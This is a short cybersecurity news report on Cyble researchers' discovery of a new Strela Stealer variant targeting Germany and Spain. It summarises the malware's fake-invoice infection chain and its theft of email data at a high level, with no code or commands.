New Variation of Strela Stealer Uncovered by CRIL Researchers

Cyble Research and Intelligence Labs (CRIL) researchers have made a significant discovery in the world of cybersecurity, uncovering a new variation of the Strela Stealer that is causing waves in the industry. This new variant represents a notable advancement in malware delivery techniques, showcasing increased sophistication and stealth, as reported by Cyble in a recent blog post.

The latest campaign targeting Germany and Spain features versions in German, Spanish, and Basque, but experts warn that this malware could easily be repurposed for attacks in other regions, similar to what happened with the initial version of the infostealer.

The new Strela Stealer variant is using obfuscated JavaScript and base64-encoded PowerShell commands, making it extremely difficult to detect and respond to, according to Cyble. Additionally, the malware is now executing the DLL file directly from a WebDAV server without saving it to disk, further enhancing its ability to evade security measures.

This malicious software is designed to steal email configuration details and gather detailed system information, allowing attackers to conduct reconnaissance and potentially launch further targeted actions on compromised systems, Cyble explained.

The new campaign begins with a fake invoice notification and a ZIP file attachment containing obfuscated JavaScript code. This code runs through WScript, launching a base64-encoded PowerShell command that executes the final malicious DLL from a WebDAV server using “rundll32.exe” via the export function “Entry.”

By utilizing these advanced techniques, the Strela Stealer is able to avoid detection by security products and carry out its malicious activities undetected. The full Cyble blog post includes additional details, MITRE ATT&CK techniques, and around 100 Indicators of Compromise (IoCs) for cybersecurity professionals to be aware of.